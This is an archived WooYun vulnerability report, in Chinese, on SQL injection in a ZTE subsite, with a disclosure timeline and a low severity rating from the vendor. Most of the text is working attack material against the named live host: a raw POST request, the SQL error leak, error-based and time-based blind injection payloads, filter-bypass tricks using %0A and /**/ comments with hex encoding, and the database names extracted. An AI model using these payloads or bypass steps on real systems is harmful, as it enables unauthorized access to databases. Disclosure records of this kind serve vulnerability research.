乌云(WooYun.org)历史漏洞查询---http://wy.zone.ci/
乌云 Drops 文章在线浏览--------http://drop.zone.ci/
2015-05-18: 细节已通知厂商并且等待厂商处理中 2015-05-18: 厂商已经确认,细节仅向厂商公开 2015-05-28: 细节向核心白帽子及相关领域专家公开 2015-06-07: 细节向普通白帽子公开 2015-06-17: 细节向实习白帽子公开 2015-07-02: 细节向公众公开
233
WooYun: 中兴某分站6处SQL注入打包 话说这个我真的没看出需要绕过么?直接union就出来了,顺便说下,这里还没修复。。。POST /index.php?ac=search&at=result HTTP/1.1Content-Length: 89Content-Type: application/x-www-form-urlencodedReferer: http://www.ztesoft.com:808/Cookie: e25d4f441419921f549c45d086f5f27a=1431676163Host: www.ztesoft.com:808Connection: Keep-aliveAccept-Encoding: gzip,deflateUser-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/38.0.2125.0 Safari/537.36Accept: */*keyname=1&keyword=%e8%af%b7%e8%be%93%e5%85%a5%e5%85%b3%e9%94%ae%e8%af%8d&lng=cn&mid=0参数key,加引号报错。mySQL info: Can not connect to MySQL server Time:Etc/GMT-8 2015-05-15 16-00-04 SQL:SELECT COUNT(*) AS num FROM zte_document as a Left join zte_document_content as b On a.did=b.did WHERE a.lng='cn' AND a.isclass=1 AND a.islink=0 AND a.1\'\" like '%èˉ·è????¥??3é??èˉ?%' Error???You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near '\'\" like '%\xE8\xAF\xB7\xE8\xBE\x93\xE5\x85\xA5\xE5\x85\xB3\xE9\x94\xAE\xE' at line 1Access Query Errors
直接跑,的确跑不出来,下来说说绕过。第一步: 空格替换成--%OA---Parameter: keyname (POST) Type: error-based Title: MySQL >= 5.0 AND error-based - WHERE, HAVING, ORDER BY or GROUP BY clause Payload: keyname=1 AND (SELECT 3634 FROM(SELECT COUNT(*),CONCAT(0x7162766b71,(SELECT (ELT(3634=3634,1))),0x717a767171,FLOOR(RAND(0)*2))x FROM INFORMATION_SCHEMA.CHARACTER_SETS GROUP BY x)a)&keyword=%e8%af%b7%e8%be%93%e5%85%a5%e5%85%b3%e9%94%ae%e8%af%8d&lng=cn&mid=0 Vector: AND (SELECT [RANDNUM] FROM(SELECT COUNT(*),CONCAT('[DELIMITER_START]',([QUERY]),'[DELIMITER_STOP]',FLOOR(RAND(0)*2))x FROM INFORMATION_SCHEMA.CHARACTER_SETS GROUP BY x)a) Type: AND/OR time-based blind Title: MySQL >= 5.0.12 AND time-based blind (SELECT) Payload: keyname=1 AND (SELECT * FROM (SELECT(SLEEP(5)))DEdd)&keyword=%e8%af%b7%e8%be%93%e5%85%a5%e5%85%b3%e9%94%ae%e8%af%8d&lng=cn&mid=0 Vector: AND (SELECT * FROM (SELECT(SLEEP([SLEEPTIME]-(IF([INFERENCE],0,[SLEEPTIME])))))[RANDSTR])---[16:13:11] [WARNING] changes made by tampering scripts are not included in shown payload content(s)[16:13:11] [INFO] the back-end DBMS is MySQLweb server operating system: Windows 2008 R2 or 7web application technology: ASP.NET, Microsoft IIS 7.5, PHP 5.3.10back-end DBMS: MySQL 5.0但是数据库跑不出来,第二步:使用hex获取,再加个注释绕过/**/payload:keybane=1 AND (SELECT 2505 FROM(SELECT COUNT(*),CONCAT(0x7162766b71,(SELECT MID((HEX(IFNULL(CAST(schema_name AS CHAR),0x20))),1,50) FROM INFORMATION_SCHEMA/**/.SCHEMATA LIMIT 5,1),0x717a767171,FLOOR(RAND(0)*2))x FROM INFORMATION_SCHEMA/**/.CHARACTER_SETS GROUP BY x)a)结果如下:available databases [7]:[*] information_schema[*] mysql[*] performance_schema[*] test[*] ztesoft_poll[*] ztesoft_static[*] ztesoft_website
~~
危害等级:低
漏洞Rank:5
确认时间:2015-05-18 08:59
感谢~
暂无